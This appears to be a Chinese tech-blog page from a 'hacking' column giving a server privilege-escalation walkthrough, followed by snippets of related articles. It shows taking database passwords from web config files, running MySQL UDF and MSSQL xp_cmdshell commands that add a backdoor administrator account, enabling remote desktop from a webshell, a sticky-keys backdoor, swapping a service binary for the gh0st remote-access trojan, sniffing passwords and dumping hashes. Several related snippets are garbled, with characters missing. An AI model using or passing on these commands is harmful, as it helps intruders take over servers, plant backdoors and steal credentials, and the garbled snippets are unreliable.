服务器通常提权思路

最新推荐文章于 2022-04-15 12:08:44 发布
最新推荐文章于 2022-04-15 12:08:44 发布
阅读量1.1k 收藏
点赞数
分类专栏: hacking 文章标签: 服务器 数据库 数据库服务器 user system database
本文详细介绍了如何通过查找配置文件、使用特定软件配置漏洞及本地溢出来实现服务器的提权与渗透操作。包括利用MySQL root权限、SQL注入、配置文件修改等方法,并通过实例演示了如何利用这些技术进行远程桌面开启、服务替换、sniffer密码获取等高级操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

1.查找配置文件 ,翻阅网站目录下的 config.asp config.php conn.asp inc目录查找 具有高权限的账号和密码


    比如说: root 密码 SA的密码。


    // [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商


    $dbhost = 'localhost';


    // 数据库服务器


    $dbuser = 'root';


    // 数据库用户名


    $dbpw = '123';


    // 数据库密码


    $dbname = 'discuz';


    // 数据库名


    $pconnect = 0;


    // 数据库持久连接 0=关闭, 1=打


    得到root 帐户密码:


    root


    123


    利用MySQL root 提权


    DLL已成功的导出到c:\\windows\\system32\\mysqlDll_1269695183.dll


    Function 'state' already exists


    select state(“net user yhsafe yhsafe /add”)


    SQL语句成功执行:Resource id #2


    Array


    (


    [0] => 命令成功完成。


    succeed!


    [state(“net user yhsafe yhsafe /add”)] => 命令成功完成。


    succeed!


    )


    利用 SA来提权


    server=localhost;UID=saWD=123;database=masterrovider=SQLOLEDB


    执行xp_cmdshell 假如没有,记得先恢复xp_cmdshell


    Exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'


    Exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'


    开启3389:


    Exec master.dbo.xp_cmdshell 'C:\inetpub\wwwroot\bbs\3389.exe 3389'


    返回结果:


    Now opening terminate service…success!


    5.2


    OK…


    开启成功


    2.利用一些软件配置漏洞,或者本地溢出来进行提权。


    “巴西烤肉”提权:


    webshell下执行 ch.exe “net user 123 123 /add”


    360提权:


    360.exe 3389 //这样的话就开启了远程桌面


    按5下shift 就出弹出CMD


    3.替换服务法


    C:\ftp\FtpServer.exe


    对FtpServer.exe 重命名为 FtpServer1.exe


    上传一个反弹的远程控制程序。比方 gh0st


    gh0st 重命名为FtpServer.exe


    4.打破常规用webshell来进行sniffer


    能sniffer到整个服务器的FTP HTTP这类密码。


    需要用到Wireshark 专业工具来查看密码。


    5.dump 密码


    dump 需要administrator 甚至 system权限


    dump出hash 进而对内网进一步渗透

后渗透中的必要性和思路
不忘初心,护天下安全!
10-14 2697
而后渗透的本质是限把控,既包含了内网横向渗透获取更多数据和计算机控制限,也包含在当前计算机中不断升自己获取到的限和管理范围,以实现自己对“肉鸡”更为长久地控制和更为深入的接管。低的限级别将使我们受到很多的限制,在实施横向渗透或者进行持久化工作时将很困难,例如在Windows主机上如果没有管理者限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问限从Guset升到User,再到Administrator,最后到System级别。
linux思路总结
weixin_43199413的博客
07-20 1472
linux思路总结 前言 说到,首先需要获得网站的webshell限,再说的操作。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell就是网站管理员,只有站长才可以升你的限。 除非你用不正当手法入侵网
Windows、数据库
zzhokok的博客
09-18 596
Windows 用到的命令有哪些? 成功后做什么? 数据库 怎么获取账号密码? 怎么打开远程连接? 第三方 serv-U怎么? 其他待扩展。。。。。。
系列(一)----Windows Service 服务器初识与exp,mysql
fendo
03-29 2万+
一、 二、Windwos常见
服务器常见方法介绍
seek_2022的博客
04-15 7553
文章目录一、常见的方法 很多时候渗透测试人员,在做渗透的时候,拿到了网站限,会发现,网站的限调用的CMD命令,其实只是网站的限,并不是服务器管理员限,这个时候就需要去想办法升自己的限,只有自己的限够了,才可以去更好的做内网测试。 一、常见的方法 Windows常用的方式有:内核数据库、系统配置错误、组策略首选项、Bypass UAC、令牌窃取等姿势。 1、windows/linux系统漏洞; 查看windows打了什么补丁,然后去网上找存在什么样的漏
渗透之——数据库
冰河的专栏
01-04 4882
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/85768994 一、SQL Server 1.启用或关闭xp_cmdshell --启用xp_cmdshell USE master EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVER...
SQL Server 数据库的几种方法——教程
W小哥
01-20 1万+
一、简介 在利用系统溢出漏洞没有效果的情况下,可以采用数据库进行数据库的前条件: 1、服务器开启数据库服务 2、获取到最高限用户密码 (除Access数据库外,其他数据库基本都存在数据库的可能) 二、使用xp_cmdshell进行 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa限则可以用sp_configure重新开启它。 启用: EXEC sp_configure ‘show advanced opti
思路之MSSQL差异备份取系统
09-14
### 思路之MSSQL差异备份取系统限 #### 概述 本文将深入探讨如何利用MSSQL差异备份技术实现系统升的过程。差异备份作为一种常见的数据库备份方式,在安全领域内被用来进行渗透测试及防御策略的构建。...
法客周年庆++之通杀Hzhost主机+和思路的总结
02-22
本文将针对Hzhost主机系统的思路进行细致的分析与总结,涵盖信息收集、服务器软件利用、可写可执行目录查找、第三方软件文件限问题等关键方面。 首先,信息收集是过程中的首要环节。有效的信息收集有助于...
服务器技巧揭秘:C盘文件探索与限策略
文档中的思路涵盖了从基础限检查到深入系统目录探索,再到尝试调整服务限和管理安全设置的过程。者需要密切关注这些路径,以找到可能的漏洞或利用点来服务器限。同时,注意操作时的风险管理和限...
数据库总结
weixin_45605352的博客
12-08 2398
文章目录MySQL0x01 UDF0x02 MOF0x03 写入Webshell0x04 常用语句MSSQL0x01 xp_cmdshell0x02 sp_oacreate0x03 xp_regwrite0x04 JobAgent0x05 CLR0x06 写入webshell0x07 沙盒0x08 常用语句Oracle0x01 创建java函数0x02 写入webshell0x03 常用语句PostgreSQL0x01 写入webshell0x02 CVE-2
MYSQL数据库的几种方法——教程
W小哥
01-13 1万+
一、简介 在利用系统溢出漏洞无果的情况下,可以采用数据库进行数据库的前条件: 1、服务器开启数据库服务 2、获取到最高限用户密码 (除Access数据库外,其他数据库基本都存在数据库的可能) 常见密码获取方式: 1、读取网站数据库配置文件(了解其命名规则及查找技巧) 例如:sql data inc config conn database common include等 2、读取数据库存储或备份文件(了解其数据库存储格式及对应内容) 例如:@@basedir/data/数据库名/表名.m
MySQL
热门推荐
Grey的博客
05-12 3万+
一、Mysql必备条件1.服务器安装Mysql数据库利用Mysql的前就是服务器安装了mysql数据库,且mysql的服务没有降,Mysql数据库默认安装是以系统限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行限对于Mysql数据库服务运行限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...
最全的服务器
jihaichen的博客
07-04 4928
最全的WEBSHELLc: d: e:..... -------------------------------------------------------------------C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径, C:\Documents and Settin...
的实现
junjie1595的专栏
11-08 363
要对一个任意进程(包括系统安全进程和服务进程)进行指定了写相关的访问的OpenProcess操作, 只要当前进程具有SeDeDebug限就可以了。 要是一个用户是Administrator或是被给予了相应的限, 就可以具有该限。 可是,就算我们用Administrator帐号对一个系统安全进程执行OpenProcess(PROCESS_ALL_ACCESS,FALS
学习:服务器方法总结-超细(补充节点0x02)
bylfsj的博客
10-09 2746
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 【 web 】   dos命令大全   SQL语句直接开启3389 常见杀软 windows中敏感目录和敏感注册表的利用 中的敏感注册表位置 wscript.shell的删除和恢复 如何找到准确的终端连接端...
Hive错误:Error: FUNCTION 'NUCLEUS_ASCII' already exists. (state=X0Y68,code=30000)
doupeihua的专栏
09-10 7957
错误现象: ----------------------------------------------------------------------------------------------------------------- doupeihua@doupeihua-2104 ~/software/hive/bin $ schematool -initSchema -dbTyp
Mysql服务器
jiazhipeng12的专栏
12-08 470
记一次比较艰难奇葩的mysql。最新dedecms出了漏洞。很常规就找几个站日日。dedecms为主流了有这么些常规的Oday日起站来容易。很简单就拿下了shell。不过中途被安全狗的各种杀。还好有过狗菜刀。接着看着虚拟主机。好久没过虚拟主机的。以前都是限大的才。这次着试试。限很小。一般mysql我先是看站是不是mysql的。然后找配置文件看下。看连接数...
Linux系统思路
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的exp放出来,如果有的话,直接编译运行即可,简单粗暴。       如果没有相关内核的exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种思路,第一种就是内核e
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值